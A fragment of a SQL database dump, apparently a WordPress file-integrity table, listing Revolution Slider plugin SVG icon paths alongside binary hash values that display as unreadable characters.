@','uDIF!\'>A?OG<','',0,'?'),(']?B\r?V4','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_settings_applications_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_settings_applications_24px.svg',0,'6~Qs 4|$t','6~Qs 4|$t','_Ԇ89W:\nȔ9ր\Zwz{!','',0,'?'),('ys2lq!','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_settings_backup_restore_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_settings_backup_restore_24px.svg',0,'[3t_E0[]','[3t_E0[]','EOp@KMX,0&(b\rA/','',0,'?'),('g$ S5ÀS','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_settings_bluetooth_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_settings_bluetooth_24px.svg',0,'\ZK9(\r<n-','\ZK9(\r<n-','\0[j#Ȓ;rvw!&x H+d','',0,'?'),('AwFI','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_settings_brightness_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_settings_brightness_24px.svg',0,' @^ZOf\"+',' @^ZOf\"+','H~- li& 5j- o.1','',0,'?'),('}\\HJr(()','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_settings_cell_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_settings_cell_24px.svg',0,'$ 5Q\n(hm','$ 5Q\n(hm','.LcC(u+FhuAN7','',0,'?'),('7h_ye','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_settings_ethernet_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_settings_ethernet_24px.svg',0,'A\0\"z?bB','A\0\"z?bB','ꡖp\"!19*NL`','',0,'?'),('LN S\'','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_settings_input_antenna_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_settings_input_antenna_24px.svg',0,'*,Ԇ]{H','*,Ԇ]{H','$Ng\nS\0Չ\\:ܬ9[S S','',0,'?'),('52=\n눲r2','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_settings_input_component_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_settings_input_component_24px.svg',0,'q`y_-Kc\\','q`y_-Kc\\','vA-iSfE$Yf{2','',0,'?'),('\"&#S}fUw','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_settings_input_composite_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_settings_input_composite_24px.svg',0,'q`y_-Kc\\','q`y_-Kc\\','vA-iSfE$Yf{2','',0,'?'),('xg[vF~7\'','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_settings_input_hdmi_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_settings_input_hdmi_24px.svg',0,'/Lt;!kҾ','/Lt;!kҾ','FLEQF3ba\rJ$ƏL/Ϩ<2','',0,'?'),('+s1pڦ','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_settings_input_svideo_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_settings_input_svideo_24px.svg',0,'2GLv )','2GLv )','( ׻i2\rQ(J|ǖ *x','',0,'?'),('׹(GpBխttw','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_settings_overscan_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_settings_overscan_24px.svg',0,'=^ l\Z/ETNA','=^ l\Z/ETNA','\nv=Os(˔[\"&$-^','',0,'?'),('SySEPNU','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_settings_phone_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_settings_phone_24px.svg',0,'\"ׁ','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_settings_voice_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_settings_voice_24px.svg',0,';Ջ i$',';Ջ i$','XĪVu.Q>x/b{Aj','',0,'?'),('yCa:s]OO,','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_shop_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_shop_24px.svg',0,'G\'(TF\"O','G\'(TF\"O','\' DU+ҥYB8\'','',0,'?'),(' :mP','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_shop_two_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_shop_two_24px.svg',0,'l. h\nA','l. h\nA','Oc^$B6I1aC ȑ~oz','',0,'?'),('z!!jOQѮ','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_shopping_basket_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_shopping_basket_24px.svg',0,'m\\i&URP\'`\"G/','m\\i&URP\'`\"G/','%ތiR9w=\\`o5\r\0-~m[','',0,'?'),('QUuU>','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_shopping_cart_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_shopping_cart_24px.svg',0,'|F5CV:','|F5CV:','Ԟe;nTGKk`߈68','',0,'?'),('XHR)I6','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_speaker_notes_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_speaker_notes_24px.svg',0,'P#qb\0&[/4','P#qb\0&[/4','--]NU\n?:I0;5-1 A','',0,'?'),('9^GYM4','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_spellcheck_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_spellcheck_24px.svg',0,'w]O\\:N','w]O\\:N','vnC;e_fs2Sθن[KPV!Sa','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_stars_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_stars_24px.svg',0,'RbvM)B','RbvM)B',' \n1[ǎCh4Dׄ.d?U:','',0,'?'),('}*q7','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_store_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_store_24px.svg',0,'Cؗ5D=_E','Cؗ5D=_E','TW+ݳ4\r$Y.&}\0v','',0,'?'),('\\wY|eIs!>i','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_subject_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_subject_24px.svg',0,' sk\'э3#',' sk\'э3#','{P+\\贜CRL7mڹO,nm','',0,'?'),('bP7P<*','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_supervisor_account_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_supervisor_account_24px.svg',0,'hX\\drn˘F2','hX\\drn˘F2','-Yos%=ܼms\'X2V','',0,'?'),('˜7sBl#J}-','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_swap_horiz_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_swap_horiz_24px.svg',0,'O8HW߻9+J','O8HW߻9+J','umbqo:XMF&','',0,'?'),(',ݡQ$Q︿?h','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_swap_vert_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_swap_vert_24px.svg',0,'=JxbYxm','=JxbYxm','4pҗU钩.\0snASQ{','',0,'?'),('\"ȿ \0 xy','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_swap_vertical_circle_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_swap_vertical_circle_24px.svg',0,'A@\Z6GCDJ','A@\Z6GCDJ','\'E{҂3E,.zN- ΣlndL','',0,'?'),('K\\anNNg@T','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_system_update_alt_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_system_update_alt_24px.svg',0,'ÒH*6NMﴉ','ÒH*6NMﴉ','~$fl m%a~X,$\\i','',0,'?'),('wz.@Izv','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_tab_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_tab_24px.svg',0,'^q~R{ 2Wu','^q~R{ 2Wu','ĩzʍ k\Zyc\ZJ { 6Z ','',0,'?'),('(Bi#\nkol','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_tab_unselected_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_tab_unselected_24px.svg',0,'`™̃~f','`™̃~f','s=5%m4Bj+8QKDj?','',0,'?'),('7\rD![JNü\ZȻ','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_theaters_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_theaters_24px.svg',0,'H\r2Rڤ','H\r2Rڤ','jf0k ߶zc~ъ@r^f0.','',0,'?'),('`buCeK;','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_thumb_down_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_thumb_down_24px.svg',0,'o','o','q*ޘilwvq]ө\0{R','',0,'?'),('wwelmd','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_thumb_up_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_thumb_up_24px.svg',0,'K{Wǒܟk','K{Wǒܟk','Av\\GU#tB _t7HS,g','',0,'?'),('@6RRu4','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_thumbs_up_down_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_thumbs_up_down_24px.svg',0,'/Ѣ\nқ','/Ѣ\nқ','<~#D{ȏ5\neȨɎςylg\r','',0,'?'),('Lšٻd|zVlȫc','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_timeline_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_timeline_24px.svg',0,'\0cd͂Q','\0cd͂Q','y$MbzN7#yt,xo','',0,'?'),('h M(ޟDb','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_toc_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_toc_24px.svg',0,'F\naD<\0u','F\naD<\0u','M2*R3;j\\Cj','',0,'?'),('ט\"ԓ%Tbv','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_today_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_today_24px.svg',0,'ұ=%F','ұ=%F',')8qT5lf\\MU8};','',0,'?'),(' 4& ǟ M0','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_toll_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_toll_24px.svg',0,'_Z\'9TNd','_Z\'9TNd','˳*:˛\rO_sƯ/+# ','',0,'?'),('б0Z\n','B$H!\0+]~H>\n',' ;Apՠ>g~~>\\Nv:9i','',0,'?'),(' TR1m0~','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_trending_flat_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_trending_flat_24px.svg',0,'{#s$cm','{#s$cm','W)sZNd$;vթnn@@Z?usW','',0,'?'),('}Qp wQ','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_trending_up_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_trending_up_24px.svg',0,'ZnagJ','ZnagJ','e&8b³),','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_verified_user_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_verified_user_24px.svg',0,'|(s0$r {j','|(s0$r {j','Ή(Zvo$z >{Y,Nk.Q','',0,'?'),('eAIPa','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_view_agenda_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_view_agenda_24px.svg',0,'bsn\n','bsn\n',']A/sa92۟84ׇ\ZׁPH','',0,'?'),('譬^m\0 ','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_view_array_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_view_array_24px.svg',0,'\r)Utk*Y\"P','\r)Utk*Y\"P','. \Z fJsW.E Ta','',0,'?'),('a.oME`Y','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_view_carousel_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_view_carousel_24px.svg',0,'c`^2MpEddt','c`^2MpEddt','xW=7$v>RkO8+Z̧','',0,'?'),('݆M8fn\'OP','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_view_column_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_view_column_24px.svg',0,'$\r{\"\0zz^R8','$\r{\"\0zz^R8','yǹvTi*gP^n`oy','',0,'?'),('oycΏه','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_view_day_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_view_day_24px.svg',0,'3u9:U: k_','3u9:U: k_','ҡKt\r5X\")1%h\"^\rZ>+1~','',0,'?'),('iy}~.@','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_view_headline_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_view_headline_24px.svg',0,'R>M+di R{','R>M+di R{','j #cs$LiLp','',0,'?'),('LqwiOem','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_view_list_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_view_list_24px.svg',0,'W<#IK!','W<#IK!','XDe{̋6M#%3`>}o7','',0,'?'),('E\ZJC','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_view_module_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_view_module_24px.svg',0,'i@NikR4\0','i@NikR4\0','o)ɴviI/!KO/\n8','',0,'?'),('*q0$rac4','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_view_quilt_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_view_quilt_24px.svg',0,'k\0wAIk$','k\0wAIk$','/{i!6,NFx]-|HAI^I','',0,'?'),('#n8R_:\'FƖ\Z','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_view_stream_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_view_stream_24px.svg',0,'JVq[ICj','JVq[ICj','@/\Z:j z:\'y>yzQ\n','',0,'?'),('*d)nː','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_view_week_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_view_week_24px.svg',0,'[o<5','[o<5','LÜI3\\3@I.\ry','D;IAEj>',' 1HP~QH1*}.G} 1E','',0,'?'),('1EVoE','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_work_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_work_24px.svg',0,'wVduCz9l','wVduCz9l','}[m\07vZϓE|%N','',0,'?'),('܀.5Fqߟ[~','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_youtube_searched_for_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_youtube_searched_for_24px.svg',0,'OEiVke','OEiVke','EviX^=B&}(^SmGC','',0,'?'),('^aDV0%','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_zoom_in_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_zoom_in_24px.svg',0,'D Tyz8\"S ','D Tyz8\"S ','J^.k_gvbs%J| D','',0,'?'),('\n5W\ZL\\t?','wp-content/plugins/revslider/public/assets/assets/svg/action/ic_zoom_out_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/action/ic_zoom_out_24px.svg',0,'l T qp{2','l T qp{2','T~E>;4%)N!iew}5p;nhR','',0,'?'),('lk+','wp-content/plugins/revslider/public/assets/assets/svg/alert/ic_add_alert_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/alert/ic_add_alert_24px.svg',0,'tnjroY)m','tnjroY)m','B\\+Ι:[M8b X\r*Y','',0,'?'),('1lDÁ2}h1','wp-content/plugins/revslider/public/assets/assets/svg/alert/ic_error_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/alert/ic_error_24px.svg',0,'[c1Z{SRM','[c1Z{SRM','Q:T\0\'SD{mY2tC#n/','',0,'?'),('ihm(й:>','wp-content/plugins/revslider/public/assets/assets/svg/alert/ic_error_outline_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/alert/ic_error_outline_24px.svg',0,'wK\\ĶÙ','wK\\ĶÙ','zaψe}Gt$}{P Ȁ','',0,'?'),('\rXl^#C','wp-content/plugins/revslider/public/assets/assets/svg/alert/ic_warning_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/alert/ic_warning_24px.svg',0,'k(1:bck','k(1:bck','*t蛪 tmSI o2\r|o۲2k','',0,'?'),('smoo\rXxbb0','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_add_to_queue_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_add_to_queue_24px.svg',0,'2EjgXFz o','2EjgXFz o','UHp3عaл','',0,'?'),('P F]qN','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_airplay_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_airplay_24px.svg',0,'%b]v4)+\r','%b]v4)+\r',';yDNFHp\ZETyb22_','',0,'?'),('d3','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_album_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_album_24px.svg',0,'# S\06-4','# S\06-4','O>5cIf܎ sGl8z[4','',0,'?'),('UIF:\"]=','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_art_track_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_art_track_24px.svg',0,'siS?L \\U@97','siS?L \\U@97','\Ze* F̒KDG','',0,'?'),('u30Bi>#zCeEz','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_av_timer_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_av_timer_24px.svg',0,' \r M\n',' \r M\n','gi{GB29I嬩ul!','',0,'?'),('@p\n`R','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_closed_caption_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_closed_caption_24px.svg',0,'n1\0$4<%4 uJwr!==','',0,'?'),('c|1l{N','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_fast_rewind_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_fast_rewind_24px.svg',0,'/+p7@','/+p7@',':FV\ZnQ.yWLiV','',0,'?'),('J^\0ՠ\\[','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_fiber_dvr_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_fiber_dvr_24px.svg',0,'G5\0','G5\0','Ò]gq-aȠ.Kw)0\'','',0,'?'),(';oؼencUyE@','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_fiber_manual_record_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_fiber_manual_record_24px.svg',0,'K{q','K{q','B_v\\L:X/pٞg挲G.`t Af','',0,'?'),('CgG̕09s','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_fiber_new_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_fiber_new_24px.svg',0,'YheR(!ԩ\"D&zt3Y','',0,'?'),('8|8x0','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_fiber_pin_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_fiber_pin_24px.svg',0,'d)tndI','d)tndI','G3 UtIn_36P','',0,'?'),('W]MС6n','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_fiber_smart_record_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_fiber_smart_record_24px.svg',0,'8ѯ ֹ2ti','8ѯ ֹ2ti','Fam5kS R;BNW9','',0,'?'),('>9EOXۥ','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_forward_10_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_forward_10_24px.svg',0,'bClꟗ^<#{','bClꟗ^<#{','O0#ʯVf82uq D: N>e\\','',0,'?'),('5KB7SߒOt ','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_forward_30_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_forward_30_24px.svg',0,'xÜc4\'Xa ','',0,'?'),('=uw1$eZ6^,','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_hd_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_hd_24px.svg',0,'--o','--o','\"B1H5Lj4ȍ\"onxWG\\','',0,'?'),('k-\'Ϸ0v','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_hearing_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_hearing_24px.svg',0,'{{|o7a','{{|o7a','F|I}na05%F','',0,'?'),('D>IFo','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_high_quality_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_high_quality_24px.svg',0,'Gl*G8_#<','Gl*G8_#<','xm<|n7j\\\"#jZ/1AS','',0,'?'),(' 1T)y2iY','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_library_add_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_library_add_24px.svg',0,'rĚK','rĚK','˛K iF(6yv stUXVĺA','',0,'?'),('Va04\Zx1R','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_library_books_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_library_books_24px.svg',0,'q ehNP&z','q ehNP&z','+ЉHlc\\2!^ed:U','|>ed:U','Xc\Z3V.M(9rLi','',0,'?'),('UAM)P','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_music_video_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_music_video_24px.svg',0,'~f̨_','~f̨_','STύfsL5lF|\rp7C=7Uw\r+0','',0,'?'),('L^[0!_./','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_new_releases_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_new_releases_24px.svg',0,'Z3˰rLnf','Z3˰rLnf','# N?76Ҷ2Gk5j5E|','',0,'?'),(':]69w*6}(G','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_not_interested_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_not_interested_24px.svg',0,'0}} w','0}} w','幑姥6wXK]I;x4','',0,'?'),('Sȏ<`,^s','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_pause_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_pause_24px.svg',0,'\\h\0=9\"','\\h\0=9\"','mldJYEA_}Ѯrw\nY9','',0,'?'),('v\" \r\"','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_pause_circle_filled_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_pause_circle_filled_24px.svg',0,'_My9TKVq(','_My9TKVq(','ojLV)fXhcbyQ','',0,'?'),('5x{3x5эNrB','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_pause_circle_outline_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_pause_circle_outline_24px.svg',0,'L0wר4 ','L0wר4 ',' <1x9L405X@!vk_KTϫ>','',0,'?'),('CiJdIDrD]p','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_play_arrow_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_play_arrow_24px.svg',0,'vt3ڛ?x','vt3ڛ?x','_ [hS[?kL DQ%Nr+Ҫ','',0,'?'),(',4z\"fQ','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_play_circle_filled_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_play_circle_filled_24px.svg',0,'~CΥ>]ȡ*7','~CΥ>]ȡ*7','_8g IOB=_','9q6ȈC\rvg>_','䘡%E.5pIp>NWk','',0,'?'),('t\'epU=Y;','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_playlist_play_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_playlist_play_24px.svg',0,'%hӐ׿r4','%hӐ׿r4','w8QOڂ]:KBHJs','',0,'?'),('&jv+ ','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_queue_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_queue_24px.svg',0,'rĚK','rĚK','˛K iF(6yv stUXVĺA','',0,'?'),('\Z]CV1uO7N','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_queue_music_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_queue_music_24px.svg',0,'\\Zc F30','\\Zc F30','m=Mŏ\rl\"`1qG\Z6~,6','',0,'?'),(':8c`L{&','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_queue_play_next_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_queue_play_next_24px.svg',0,'ngMmDMJ#Q ','ngMmDMJ#Q ','zJY\'])[N\ry!mF3o','',0,'?'),('Qt޿άǿ','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_radio_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_radio_24px.svg',0,'G/WX}9}!','G/WX}9}!','7W,!Wq v`d}ef),d','',0,'?'),('‹2` a|Z','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_recent_actors_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_recent_actors_24px.svg',0,'Iaoެi','Iaoެi','x5\n`Zz_=zC0e.\Z` 0','',0,'?'),('Tk|B*%p_V5','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_remove_from_queue_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_remove_from_queue_24px.svg',0,'zU;}B^J]\n\0\"N','zU;}B^J]\n\0\"N','Kٛ:bVf9 IZ1','',0,'?'),(']-m-sS','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_repeat_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_repeat_24px.svg',0,'e˼jl','e˼jl','V7^В^\"4!vv','',0,'?'),('G~Tx','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_repeat_one_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_repeat_one_24px.svg',0,'ao R\n321','ao R\n321','`)|\0H2\nBK˓>ZT#y`','',0,'?'),(' 